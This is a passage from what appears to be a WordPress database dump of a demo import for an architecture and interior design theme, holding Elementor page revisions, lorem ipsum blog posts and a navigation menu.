rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://demo.ovatheme.com/retirio/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2022-06-07 07:01:22','2022-06-07 07:01:22','',38,'https://bauhaus.futuremediatrix.com/?p=4622',0,'revision','',0),(4623,1,'2022-06-07 07:01:36','2022-06-07 07:01:36','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/EzkDhhJPJ1XN4SKh6\">30 broklyn golden street. New York</a>								</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=London%20Eye%2C%20London%2C%20United%20Kingdom&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"London Eye, London, United Kingdom\"\n					aria-label=\"London Eye, London, United Kingdom\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-06-07 07:01:36','2022-06-07 07:01:36','',40,'https://bauhaus.futuremediatrix.com/?p=4623',0,'revision','',0),(4624,1,'2022-06-07 07:02:21','2022-06-07 07:02:21','<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n	        				<h4>\n					Architecture				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n	        				<h4>\n					Interior work				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n	        				<h4>\n					Renovation				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n	        				<h4>\n					Decor &#038; art				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n		</a>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"95\" height=\"110\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>our benefits</h3>\n														<h2>\n								Why choose us?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n															<img width=\"1032\" height=\"578\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>SERVICES WE DO</h3>\n														<h2>\n								Our highlighted services\nfor interior design							</h2>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-04-390x473.jpg\" alt=\"Architecture\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		        					<h4>\n						Architecture					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n				</a>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-02-390x453.jpg\" alt=\"Interior work\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		        					<h4>\n						Interior work					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n				</a>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-03-390x473.jpg\" alt=\"Renovation\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		        					<h4>\n						Renovation					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n				</a>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Services','','inherit','closed','closed','','42-revision-v1','','','2022-06-07 07:02:21','2022-06-07 07:02:21','',42,'https://bauhaus.futuremediatrix.com/?p=4624',0,'revision','',0),(4627,1,'2022-06-15 06:45:21','2022-06-15 06:45:21','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text. </p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type simen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Lorem Ipsum has been the industry\'s standard dummy text ever since</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. orem Ipsum has been the industry\'s standard dummy text ever since the when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into unchanged.</p>\n<!-- /wp:paragraph -->','High Quality, Effective & Inspiring Built Space','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','1090-revision-v1','','','2022-06-15 06:45:21','2022-06-15 06:45:21','',1090,'https://bauhaus.futuremediatrix.com/?p=4627',0,'revision','',0),(4629,1,'2022-06-23 08:44:32','2022-06-23 08:44:32','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text. </p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type simen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Lorem Ipsum has been the industry\'s standard dummy text ever since</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. orem Ipsum has been the industry\'s standard dummy text ever since the when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into unchanged.</p>\n<!-- /wp:paragraph -->','Do you need math for architecture?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','2430-revision-v1','','','2022-06-23 08:44:32','2022-06-23 08:44:32','',2430,'https://bauhaus.futuremediatrix.com/?p=4629',0,'revision','',0),(4630,1,'2022-06-23 08:46:27','2022-06-23 08:46:27','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text. </p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type simen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Lorem Ipsum has been the industry\'s standard dummy text ever since</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. orem Ipsum has been the industry\'s standard dummy text ever since the when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into unchanged.</p>\n<!-- /wp:paragraph -->','What is the future of interior design?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','2432-revision-v1','','','2022-06-23 08:46:27','2022-06-23 08:46:27','',2432,'https://bauhaus.futuremediatrix.com/?p=4630',0,'revision','',0),(4631,1,'2022-11-14 03:31:03','2022-11-14 03:31:03','','logo-black','','inherit','open','closed','','logo-black-2','','','2022-11-14 03:31:03','2022-11-14 03:31:03','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/11/logo-black.png',0,'attachment','image/png',0),(4632,1,'2022-11-14 03:35:39','2022-11-14 03:35:39','','One Click Demo Import - log_file_2022-11-14__03-35-39','','inherit','open','closed','','one-click-demo-import-log_file_2022-11-14__03-35-39','','','2022-11-14 03:35:39','2022-11-14 03:35:39','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/11/log_file_2022-11-14__03-35-39.txt',0,'attachment','text/plain',0),(4633,1,'2022-06-07 06:47:56','2022-06-07 06:47:56','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 1','','publish','closed','closed','','header-1-2','','','2022-06-07 06:47:56','2022-06-07 